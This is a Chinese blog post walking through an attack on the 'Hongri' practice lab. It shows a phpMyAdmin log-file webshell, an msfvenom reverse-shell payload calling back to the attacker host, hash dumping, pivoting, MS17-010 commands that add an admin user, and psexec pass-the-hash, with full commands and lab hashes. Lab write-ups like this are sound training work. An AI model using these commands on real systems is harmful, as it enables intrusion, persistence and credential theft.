<!DOCTYPE html><html lang="en"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content=""><title>红日靶场攻克笔记一 | Ly's Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=1.0.0"><link rel="stylesheet" type="text/css" href="https://unpkg.com/normalize.css"><link rel="stylesheet" type="text/css" href="https://unpkg.com/purecss/build/pure-min.css"><link rel="stylesheet" type="text/css" href="https://unpkg.com/purecss/build/grids-responsive-min.css"><link rel="stylesheet" href="https://unpkg.com/font-awesome@4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="https://unpkg.com/jquery/dist/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><script type="text/javascript" src="https://unpkg.com/clipboard/dist/clipboard.min.js"></script><script type="text/javascript" src="https://unpkg.com/toastr/build/toastr.min.js"></script><link rel="stylesheet" href="https://unpkg.com/toastr/build/toastr.min.css"><meta name="generator" content="Hexo 7.3.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">红日靶场攻克笔记一</h1><a id="logo" href="/.">Ly's Blog</a><p class="description"></p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> Home</i></a><a href="/archives/"><i class="fa fa-archive"> Archive</i></a><a href="/about/"><i class="fa fa-user"> About</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">红日靶场攻克笔记一</h1><div class="post-meta">2023-03-31<span> | </span><span class="category"><a href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a></span></div><div class="post-content"><h4 id="靶场拓扑图"><a href="#靶场拓扑图" class="headerlink" title="靶场拓扑图"></a>靶场拓扑图</h4><p><img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage1.png"> 靶机环境分别为win7（外网）、win2008、win2003</p>
<blockquote>
<p>win7：192.168.100.101 win2008:192.168.52.138 win2003:192.168.52.141 kali:192.168.100.246</p>
</blockquote>
<h4 id="web-渗透："><a href="#web-渗透：" class="headerlink" title="web****渗透："></a><strong>web****渗透：</strong></h4><p>nmap扫描主机查看端口服务开放情况 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage2.png"> 发现开放了80端口的web服务和3306端口的mysql服务，对站点进行目录扫描 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage3.png"> 扫描发现了phpMyAdmin目录，访问弱口令root&#x2F;root直接登录 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage4.png"> 进入后再sql语句执行处检查写入权限，发现并不支持写入 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage5.png"> 查看日志记录情况，发现日志也未开启 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage6.png"> 使用语句开启日志并设置日志记录到php文件 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage7.png"> <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage8.png"> 再次查询，修改成功 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage9.png"> 写入php一句话木马 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage10.png"> 蚁剑连接，发现是管理员权限，且存在域，判断域存在与否有很多方法，总结下几种常用的:</p>
<blockquote>
<p>1、net time &#x2F;domain   通过域控授时，若不存在域会显示找不到域控制器 2、ipconfig &#x2F;all  若存在域则主DNS是域名 3、systeminfo   若存在域再域的一行会显示域名，否则会显示WORKGROUP</p>
</blockquote>
<p><img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage11.png"> <strong>内网渗透：</strong> 进入kali，使用msf模块制作木马，这里的马子没有作免杀要注意关闭杀毒软件 <code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.246 LPORT=4444 -f exe &gt; /test.exe</code> <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage12.png"> 利用蚁剑上传 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage13.png"> 在msf板块开启监听，利用蚁剑执行上线</p>
<blockquote>
<p>use exploit&#x2F;multi&#x2F;handler set payload windows&#x2F;meterpreter&#x2F;reverse_tcp set lport 4444 set lhost 192.168.100.246 exploit -j</p>
</blockquote>
<p><img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage14.png"> 首先尝试getsystem提权，成功拿到system权限，这里也可以使用cs提权ms14_058，经测试也可以拿到权限 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage15.png"> 抓取用户hash值（需要system权限）</p>
<blockquote>
<p>run hashdump</p>
</blockquote>
<p><img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage16.png"> 得到hash:</p>
<blockquote>
<p>Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</p>
</blockquote>
<p>ipconfig时发现192.168.52.0网段 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage17.png"> 尝试对52网段进行扫描，发现有存活机器</p>
<blockquote>
<p>run arp_scanner -r 192.168.52.0&#x2F;24</p>
</blockquote>
<p><img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage18.png"> 为方便进行信息收集，我们先建立一条对52网段的路由，设置端口1080，版本为4a，使用proxychains进行代理</p>
<blockquote>
<p>run autoroute -s 192.168.52.0&#x2F;24   查看路由表 run autoroute -p                                  检查路由表 background                                           返回 use auxiliary&#x2F;server&#x2F;socks_proxy   使用代理模块 set srvport 1080                                   设置端口 set version 4a                                        设置版本 run</p>
</blockquote>
<p><img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage19.png"> <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage20.png"> 配置kali socks代理，编辑&#x2F;etc&#x2F;proxychains4.conf，在[ProxyList]添加一条socks代理 0.0.0.0 1080         代理所有来自1080端口的流量 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage21.png"> 使用proxychains代理curl 192.168.52.138主机，得到回显说明我们代理配置成功 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage22.png"> 扫描常见端口</p>
<blockquote>
<p>proxychains4 nmap -sT -Pn -p 20,21,22,23,24,25,80,443,445,3306,3389 192.168.52.141</p>
</blockquote>
<p><img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage23.png"> 扫描ms17-010，发现存在漏洞 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage24.png"> 尝试进一步利用，选择比较稳定的command利用模块，尝试执行net user执行成功</p>
<blockquote>
<p>use auxiliary&#x2F;admin&#x2F;smb&#x2F;ms17_010_command set COMMAND net user set rhost 192.168.52.141 exploit</p>
</blockquote>
<p><img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage25.png"> <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage26.png"> 添加用户</p>
<blockquote>
<p>set COMMAND net user first yyds@123 &#x2F;add</p>
</blockquote>
<p>添加成功 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage27.png"> 把添加的用户加入管理员组</p>
<blockquote>
<p>set COMMAND net localgroup administrators first &#x2F;add</p>
</blockquote>
<p>加入成功 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage28.png"> 尝试开启telnet服务</p>
<blockquote>
<p>set COMMAND sc config tlntsvr start&#x3D; auto set COMMAND net start telnet</p>
</blockquote>
<p>开启成功 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage29.png"> nmap扫描确认23端口开启</p>
<blockquote>
<p>proxychains4 nmap -sT -Pn -p 23 192.168.52.141</p>
</blockquote>
<p><img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage30.png"> 本地连接telnet服务，输入刚才创建的账户登录，拿到141主机的shell <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage31.png"> 按照上面的方法同样我们也可以拿到138的域控主机，另外因为几台主机密码都一样所以也可以使用hash传递攻击，使用hash传递时要注意使用正向连接，因为138主机是不出网的</p>
<blockquote>
<p>use exploit&#x2F;windows&#x2F;smb&#x2F;psexec set payload windows&#x2F;meterpreter&#x2F;bind_tcp set lhost 192.168.100.246 set rhost 192.168.52.138 set smbuser 账户名 set smbpass LM:NTLM exploit</p>
</blockquote>
<p><img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage32.png"> 这里还有一个问题就是我在hash传递时使用msf hashdump出来的hash是报错的,可能是模块有点问题 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage33.png"> 于是我是用cs重新抓取了下hash，在msf中重新设置smbpass</p>
<blockquote>
<p>set smbpass f26fb3ae03e93ab9c81667e9d738c5d9:b367819c0a8ccd792cad1d034f56a1fa</p>
</blockquote>
<p><img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage34.png"> <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage35.png"> <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage36.png"> 成功拿到138主机的shell，登录发现已经是system权限 <img src="https://lyblog-1309143339.cos.ap-beijing.myqcloud.com/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA1%2Fimage37.png"></p>
<h4 id="总结"><a href="#总结" class="headerlink" title="总结:"></a>总结:</h4><p>靶场1考察比较基础的内网知识，需要掌握各操作系统的指令、经典的漏洞以及msf等工具的使用。</p>
</div><div class="tags"><ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag">web安全</a></li></ul></div><div class="post-nav"><a class="pre" href="/2023/04/11/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E6%94%BB%E5%85%8B%E7%AC%94%E8%AE%B0%E4%BA%8C/">红日靶场攻克笔记二</a><a class="next" href="/2023/03/31/413/">Untitled Post - 7</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><form class="search-form" action="//www.google.com/search" method="get" accept-charset="utf-8" target="_blank"><input type="text" name="q" maxlength="20" placeholder="Search"/><input type="hidden" name="sitesearch" value="http://example.com"/></form></div><div class="widget"><div class="author-info"><a class="info-avatar" href="/about/" title="About"><img class="nofancybox" src="/img/avatar.png"/></a><p>寻不到答案，便去寻自己</p></div></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> Categories</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/java/">java</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/python/">python</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/toy/">toy</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/uncategorized/">uncategorized</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> Tags</i></div><div class="tagcloud"><a href="/tags/ctf/" style="font-size: 15px;">ctf</a> <a href="/tags/toy/" style="font-size: 15px;">toy</a> <a href="/tags/web%E5%AE%89%E5%85%A8/" style="font-size: 15px;">web安全</a> <a href="/tags/java/" style="font-size: 15px;">java</a> <a href="/tags/python/" style="font-size: 15px;">python</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> Recent</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2024/10/18/hello-world/">Hello World</a></li><li class="post-list-item"><a class="post-list-link" href="/2024/02/28/%E8%AE%B0%E4%B8%80%E6%AC%A1sql%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87%E5%AE%9E%E6%88%98/">记一次sql注入绕过实战</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/11/13/510/">记一次娱乐测试</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/10/18/vulnhub-dc3%E9%9D%B6%E5%9C%BA/">vulnhub-DC3靶场</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/09/13/vulnhub%E6%89%93%E9%9D%B6%E9%9B%86%E5%90%88/">Vulnhub打靶集合</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/09/11/laravel-debug-mode-rce%EF%BC%88cve-2021-3129%EF%BC%89%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">Laravel Debug mode RCE（CVE-2021-3129）漏洞复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/05/25/selenium%E8%87%AA%E5%8A%A8%E5%8C%96%E5%B7%A5%E5%85%B7%E7%9A%84%E4%BD%BF%E7%94%A8/">selenium自动化工具的使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/05/13/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E6%94%BB%E5%85%8B%E7%AC%94%E8%AE%B0%E5%9B%9B/">红日靶场攻克笔记四</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/04/20/%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E5%85%A5%E9%97%A8%E6%8C%87%E5%8D%97/">电子取证入门指南</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/04/17/%E5%85%B3%E4%BA%8E%E4%B8%AA%E4%BA%BA%E5%8D%9A%E5%AE%A2%E7%AB%99%E7%82%B9%E7%9A%84%E5%9F%BA%E7%A1%80%E9%98%B2%E6%8A%A4/">关于个人博客站点的基础防护</a></li></ul></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2024 <a href="/." rel="nofollow">Ly's Blog.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=1.0.0" async></script><script type="text/javascript" src="https://unpkg.com/@fancyapps/fancybox/dist/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=1.0.0" async></script><link rel="stylesheet" type="text/css" href="https://unpkg.com/@fancyapps/fancybox/dist/jquery.fancybox.min.css"><script type="text/javascript" src="/js/copycode.js?v=1.0.0" successtext="Copy Successed!"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css?v=1.0.0"><script type="text/javascript" src="/js/codeblock-resizer.js?v=1.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=1.0.0"></script></div></body></html>